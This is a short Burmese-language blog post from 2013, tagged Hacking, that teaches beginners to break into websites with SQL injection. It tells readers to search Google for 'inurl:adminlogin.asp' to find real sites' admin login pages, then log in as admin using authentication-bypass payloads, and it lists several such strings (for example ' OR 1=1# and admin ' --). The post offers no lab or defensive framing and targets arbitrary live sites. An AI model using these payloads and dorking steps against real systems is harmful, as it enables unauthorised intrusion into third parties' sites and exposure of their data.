Pages

Translate

Friday, January 4, 2013

SQL လံုး၀မသိရင္ နမူနာအေနနဲ႔ ဘယ္လိုဟက္တယ္ ?

1) အရင္ဆုံး google.com ကုိသြားလုိက္.....
2) search မွာ inurl:adminlogin.asp လုိ႔ type ျပီးရွာလုိက္ (ေတြ႔လိမ္႔မယ္...ပုံေနတာပဲ ) ။
3) အဲဒီထဲကမွ admin panel ကုိဝင္လုိ႔ရမဲ႔ ဆုိက္ေတြကုိလုိက္ရွာ.....
4) user name = admin ; password = 'or''=' ကုိသုံးျပီးရွာပါ ။ တစ္ခ်ဳိ႔ password field ေနရာေတြမွာ ေအာက္မွာျပထားသလုိ SQL query ေတြနဲလဲဝင္လုိ႔ရပါတယ္
Code:

' OR 1=1#
' or 'a'='a#
''=''
1'or'1'='1
admin ' --

http://api.ning.com/files/HCIR54AKIKcwcq-IQxYqO531*zq9NFvM2wLeTkW4X4UxyC5J78LgKjROlwttdxUXRbEDB4FQ7qDdbmvBE1r5--x9Zd1Gyqqqwbg7RvVr3Ec_/abc.bmp

Code ေတြထပ္လိုခ်င္ရင္ ဒီေနရာမွာ တင္ထားေသးတယ္ ။
Tags: Hacking


0 comments:

Post a Comment